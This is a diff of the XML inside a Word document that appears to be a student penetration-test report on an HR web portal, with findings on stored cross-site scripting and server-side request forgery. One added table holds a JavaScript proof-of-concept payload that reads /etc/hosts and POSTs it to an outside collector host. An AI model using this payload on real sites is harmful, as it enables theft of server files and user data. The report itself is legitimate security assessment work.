+              <w:t>xhr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>XMLHttpRequest</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr.onload</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = function () {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    var xhr2 = new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>XMLHttpRequest</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    xhr2.send("test=" + </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>this.responseText</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  };</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr.open</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>("GET", "/etc/hosts");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr.send</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3007" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43E78C02" wp14:editId="41C3D46C">
+                  <wp:extent cx="2127013" cy="1101219"/>
+                  <wp:effectExtent l="0" t="0" r="6985" b="3810"/>
+                  <wp:docPr id="10" name="Picture 10"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="10" name="Picture 10"/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId20"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2149725" cy="1112978"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:sectPr>
-      <w:footerReference w:type="default" r:id="rId14"/>
-      <w:footerReference w:type="first" r:id="rId15"/>
+      <w:footerReference w:type="default" r:id="rId21"/>
+      <w:footerReference w:type="first" r:id="rId22"/>
       <w:pgSz w:w="11909" w:h="16834"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:pgNumType w:start="1"/>
@@ -12363,6 +16232,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
+    <w:rsid w:val="00DD5C1A"/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading1">
     <w:name w:val="heading 1"/>
@@ -12676,6 +16546,23 @@
         <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
       </w:tblBorders>
     </w:tblPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="FollowedHyperlink">
+    <w:name w:val="FollowedHyperlink"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00B93ABC"/>
+    <w:rPr>
+      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="treelabel">
+    <w:name w:val="treelabel"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00EF0E63"/>
   </w:style>
 </w:styles>
 </file>

--- a/Assignment 2 Pentest Report.docx
+++ b/Assignment 2 Pentest Report.docx
@@ -558,91 +558,103 @@
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> vulnerability is the stored cross-site scripting in the web application’s anonymous question functionality (Finding 2). This vulnerability allows users to inject a piece of code to the database, which will perform unauthorised actions when triggered. As a result of </w:t>
+        <w:t xml:space="preserve"> vulnerability is the stored cross-site scripting in the web application’s anonymous question functionality (Finding 2). This vulnerability allows users to inject a piece of code to the database, which will perform unauthorised actions when triggered. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>such</w:t>
+        <w:t xml:space="preserve">The third </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
+        <w:t xml:space="preserve">high-risk </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">users </w:t>
+        <w:t xml:space="preserve">vulnerability </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>will</w:t>
+        <w:t xml:space="preserve">is </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> be able to leak out the server file content which </w:t>
+        <w:t>the</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>can</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> be feeding to </w:t>
+        <w:t>server-side request forgery</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">another high-risk </w:t>
+        <w:t>, which</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">vulnerability – </w:t>
+        <w:t xml:space="preserve"> can be </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>the</w:t>
+        <w:t xml:space="preserve">made through the website validation </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>API</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve">server-side request forgery can be </w:t>
+        <w:t xml:space="preserve"> (Finding 3) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>made through the website validation API (Finding 3) based on the information gained from cross-site scripting</w:t>
+        <w:t>t</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t xml:space="preserve"> to access sensitive background checks information</w:t>
+        <w:t xml:space="preserve">o </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>leak out users’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sensitive background checks information</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -704,16 +716,20 @@
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
+        <w:t xml:space="preserve"> training</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>trainings</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>lookup</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:eastAsia="zh-CN"/>
@@ -5295,7 +5311,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>it happens will significantly decreases.</w:t>
+              <w:t>it happens will significantly decrease.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6382,11 +6398,25 @@
             </w:pPr>
             <w:r>
               <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>The</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:b/>
                 <w:bCs/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>Stored cross-site scripting</w:t>
+              <w:t xml:space="preserve"> s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>tored cross-site scripting</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6406,7 +6436,13 @@
                 <w:bCs/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>anonymous question functionality</w:t>
+              <w:t xml:space="preserve">anonymous question </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>functionality</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6444,7 +6480,19 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>and when the code is triggered, unauthorised actions with elevated privileges could be performed on behalf the admin users.</w:t>
+              <w:t xml:space="preserve">and when the code is triggered, unauthorised actions with elevated privileges could be performed </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>in the name of</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> admin users.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6513,7 +6561,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> it happens will significantly decreases.</w:t>
+              <w:t xml:space="preserve"> it happens will significantly decrease.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6820,40 +6868,42 @@
               <w:rPr>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve">can perform unauthorised action on behalf of HR team members and fetch files from the server. This vulnerability </w:t>
+              <w:t xml:space="preserve">can perform unauthorised action on behalf of HR team members and fetch files from the server. </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve">threatens not only the </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>Since this vulnerability leaks out information about the server, it</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:bCs/>
               </w:rPr>
-              <w:t>HRHub</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t xml:space="preserve"> increases the risk of the server being exploited</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve"> portal but also potentially any other systems on the server and the server itself. </w:t>
-            </w:r>
-            <w:r>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
               <w:rPr>
                 <w:bCs/>
               </w:rPr>
-              <w:t>However, s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>ame as the SQL injection case, the attacker must already hold a set of valid credentials to exploit the vulnerability.</w:t>
-            </w:r>
+            </w:pPr>
           </w:p>
         </w:tc>
       </w:tr>
@@ -7012,22 +7062,7 @@
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve">This vulnerability does not only affect the current system but also expose potential risks to the server. </w:t>
-            </w:r>
-            <w:r>
-              <w:t>Moreover, i</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">t also provides critical information for </w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">the </w:t>
-            </w:r>
-            <w:r>
-              <w:t>server-side request forgery vulnerability</w:t>
-            </w:r>
-            <w:r>
-              <w:t>.</w:t>
+              <w:t>This vulnerability does not only affect the current system but also expose potential risks to the server.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7233,43 +7268,34 @@
               <w:t>($_POST["question"])</w:t>
             </w:r>
           </w:p>
-          <w:p>
-            <w:pPr>
-              <w:widowControl w:val="0"/>
-              <w:pBdr>
-                <w:top w:val="nil"/>
-                <w:left w:val="nil"/>
-                <w:bottom w:val="nil"/>
-                <w:right w:val="nil"/>
-                <w:between w:val="nil"/>
-              </w:pBdr>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:ind w:leftChars="100" w:left="220"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>// then display the question</w:t>
-            </w:r>
-          </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
     <w:p>
       <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="21" w:name="_Toc71325117"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc71325117"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding 3 - </w:t>
@@ -7351,10 +7377,154 @@
                 <w:between w:val="nil"/>
               </w:pBdr>
               <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t>Detailed description of the vulnerability, including a risk statement.</w:t>
-            </w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>T</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">he </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>se</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>rver-side request forgery</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> presents in the web application’s </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>web validation</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> functionality.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> An attacker can </w:t>
+            </w:r>
+            <w:r>
+              <w:t>induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> [1]</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> and leaks out sensitive information</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> without authorisations</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:widowControl w:val="0"/>
+              <w:pBdr>
+                <w:top w:val="nil"/>
+                <w:left w:val="nil"/>
+                <w:bottom w:val="nil"/>
+                <w:right w:val="nil"/>
+                <w:between w:val="nil"/>
+              </w:pBdr>
+              <w:spacing w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>T</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
